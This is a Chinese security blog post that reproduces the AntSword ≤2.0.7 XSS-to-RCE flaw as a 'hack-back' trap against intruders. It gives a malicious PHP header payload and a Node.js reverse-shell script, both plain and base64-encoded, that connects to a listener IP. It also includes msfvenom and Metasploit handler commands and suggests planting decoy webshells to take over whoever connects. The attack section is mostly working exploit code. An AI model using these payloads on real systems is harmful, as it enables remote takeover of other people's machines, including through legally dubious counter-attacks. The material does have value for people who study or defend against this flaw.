点击上方“蓝字”,关注更多精彩
"我把黑客黑了"。这句话就是溯源的意思。溯源说白了就是反黑客,利用黑客留下的入侵痕迹进行回溯追踪。关于溯源的方法,实在是太多,我这里先介绍一下这个蚁剑RCE,以此漏洞进行思维发散,抛砖引玉,大家可以自行复现关于AWVS、SQLmap、CS等相关工具的溯源技巧。
本篇文章与之前的Clash RCE类似。Clash RCE可以用来钓鱼,而蚁剑RCE可以用来溯源。Clash RCE漏洞复现与高级利用(配合社工)
0x00 漏洞概述
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
2019年4月12日凌晨,有用户在中国蚁剑GitHub上提交了issue,称发现中国蚁剑存在XSS漏洞,借此可引起RCE。该漏洞是因为在webshell远程连接失败时,中国蚁剑会返回错误信息,但因为使用的是html解析,导致xss漏洞。这个漏洞当时爆出来后,引发了各路大佬的关注。
0x01 影响范围
AntSword <=2.0.7
0x02 实验环境搭建
下载与安装v2.0.7版本蚁剑
有个坑:在kali上,就算按照issue #3更新了依赖文件,v2.0.7的蚁剑也不能安装在Kali上,软件开发问题。大家不要踩这个坑浪费时间!所以在这里将windows物理机当做攻击机,kali当做受害机器。
AntSword v2.0.7下载地址:https://github.com/AntSwordProject/antSword/releases?page=2
4.0.3 Loader不能加载老版本的蚁剑。旧版本的Loader下载地址:
https://github.com/AntSwordProject/AntSword-Loader/releases
受害机器kali
搭建apache2服务,写入一句话木马。攻击机使用蚁剑链接webshell。
0x03 漏洞复现
1、受害者查询自己的日志,发现有人入侵,并且已经控制了webshell,发现其蚁剑版本为v2.0
2、于是排查自己的网站,找到一句话木马shell.php,改成下面这段代码即可。这时攻击者再次链接webshell时,就会出现弹窗。
<?phpheader('HTTP/1.1 500 <img src=# onerror=alert(1)>');
好了,已经复现完毕了其实。但是我要扩大利用,就是反弹shell与让攻击方上线。
反弹shell
1、先来看这么一段node.js代码,在Node.js中提供了一个Net.Socket对象,用于方便调用底层Socket接口,实现数据传输的功能。Net.Socket既可以读也可以写,这个client建立socket链接,实现了将对方cmd.exe的标准输入输出与标准错误流转发到受害者自己的ip:10086端口上。
var net = require("net"), sh = require("child_process").exec("cmd.exe");var client = new net.Socket();client.connect(10086, "受害者ip", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
2、现在将这段代码进行base64加密,我这里受害者也就是kali的ip为192.168.159.160。再次声明哈,我这里的kali是受害者,是因为旧版本蚁剑在kali无法安装成功。
dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMDA4NiwgIjE5Mi4xNjguMTU5LjE2MCIsIGZ1bmN0aW9uKCl7Y2xpZW50LnBpcGUoc2guc3RkaW4pO3NoLnN0ZG91dC5waXBlKGNsaWVudCk7c2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=3、随后,将这段base64代码放入下方代码段的中Buffer函数中
header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMDA4NiwgIjE5Mi4xNjguMTU5LjE2MCIsIGZ1bmN0aW9uKCl7Y2xpZW50LnBpcGUoc2guc3RkaW4pO3NoLnN0ZG91dC5waXBlKGNsaWVudCk7c2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())'>");4、再将上面这段代码放入shell.php里,同时自身开启监听10086端口
5、新的一天,攻击者开开心心地打开自己的蚁剑,摩拳擦掌准备后渗透,结果爆红,还以为自己的密码错了或者马没了,而此时,攻击者已经被受害者控制了。
"寇可往我亦可往!攻守易型了!"——汉武大帝
坑点:我的物理机上有火绒,复现之前需要关闭火绒,不然会报僵尸网络攻击。这个火绒报警和当时复现Clash漏洞时一模一样。
MSF上线
之前复现过Clash漏洞,我们明白Clash是基于Electron架构编写的。同样的,AntSword也是基于Electron这个github开源项目写出来的。所以他们都支持node.js,再换句话说,他们都可以用node.js的木马进行远控。
MSF生成node.js木马:
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.159.160 LPORT=10086 -f raw -o payload.js
同样的操作,将payload.js中的代码复制出来进行base64加密后,放入header中
header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`KGZ1bmN0aW9uKCl7IHZhciByZXF1aXJlID0gZ2xvYmFsLnJlcXVpcmUgfHwgZ2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZDsgaWYgKCFyZXF1aXJlKSByZXR1cm47IHZhciBjbWQgPSAoZ2xvYmFsLnByb2Nlc3MucGxhdGZvcm0ubWF0Y2goL153aW4vaSkpID8gImNtZCIgOiAiL2Jpbi9zaCI7IHZhciBuZXQgPSByZXF1aXJlKCJuZXQiKSwgY3AgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIiksIHV0aWwgPSByZXF1aXJlKCJ1dGlsIiksIHNoID0gY3Auc3Bhd24oY21kLCBbXSk7IHZhciBjbGllbnQgPSB0aGlzOyB2YXIgY291bnRlcj0wOyBmdW5jdGlvbiBTdGFnZXJSZXBlYXQoKXsgY2xpZW50LnNvY2tldCA9IG5ldC5jb25uZWN0KDEwMDg2LCAiMTkyLjE2OC4xNTkuMTYwIiwgZnVuY3Rpb24oKSB7IGNsaWVudC5zb2NrZXQucGlwZShzaC5zdGRpbik7IGlmICh0eXBlb2YgdXRpbC5wdW1wID09PSAidW5kZWZpbmVkIikgeyBzaC5zdGRvdXQucGlwZShjbGllbnQuc29ja2V0KTsgc2guc3RkZXJyLnBpcGUoY2xpZW50LnNvY2tldCk7IH0gZWxzZSB7IHV0aWwucHVtcChzaC5zdGRvdXQsIGNsaWVudC5zb2NrZXQpOyB1dGlsLnB1bXAoc2guc3RkZXJyLCBjbGllbnQuc29ja2V0KTsgfSB9KTsgc29ja2V0Lm9uKCJlcnJvciIsIGZ1bmN0aW9uKGVycm9yKSB7IGNvdW50ZXIrKzsgaWYoY291bnRlcjw9IDEwKXsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgU3RhZ2VyUmVwZWF0KCk7fSwgNSoxMDAwKTsgfSBlbHNlIHByb2Nlc3MuZXhpdCgpOyB9KTsgfSBTdGFnZXJSZXBlYXQoKTsgfSkoKTs=`,`base64`).toString())'>");MSF开启监听,当攻击者再次点击链接webshell爆红而不知所以然的时候,我们已经成功溯源反制。
use exploit/multi/handlerset payload nodejs/shell_reverse_tcpset lhost 192.168.159.160set lport 10086exploit -j -z
0x04 总结
1、在溯源的过程中,经常可以看到有些人使用这些蚁剑、Sqlmap、AWVS、CS等常用工具漏洞来部署陷阱,引诱对方使用这些文件。
2、蚁剑是分两个部分下载的,一个是Loader一个是蚁剑本身。其中Loader分两个大版本,4.0.3适用于 AntSword >= v2.1.0,v2.0.1适用于AntSword v2.0.0 ~ v2.1.0。
3、小思路:可以故意放几个shell.php,exp.php这样的文件在网站根目录下,故意让对方扫到,让对方尝试链接的时候,直接上线被我们控制。
4、及时更新自己的蚁剑,也不要动不动就去随便连接扫出来的webshell,谨慎为妙!
5、Clash与AntSword都是基于Electron架构编写,只要是Electron架构的具有XSS致使RCE的漏洞,都可按照此种方法进行溯源反制。
往期推荐
CVE-2021-4034 Linux Polkit本地提权漏洞
CVE-2021-31760 Webmin CSRF致使RCE
CVE-2022-22965 Spring core RCE漏洞
CVE-2020-1472 ZeroLogon漏洞复现利用(Netlogon域提权)
郑重声明:该公众号大部分文章来自作者日常工作与学习笔记,也有少数文章是经过原作者授权转载而来,未经授权,严禁转载。如需要,请公众号私信联系作者。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与原作者以及本公众号无关。
原文始发于微信公众号(HACK技术沉淀营):利用AntSword RCE进行溯源反制黑客
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论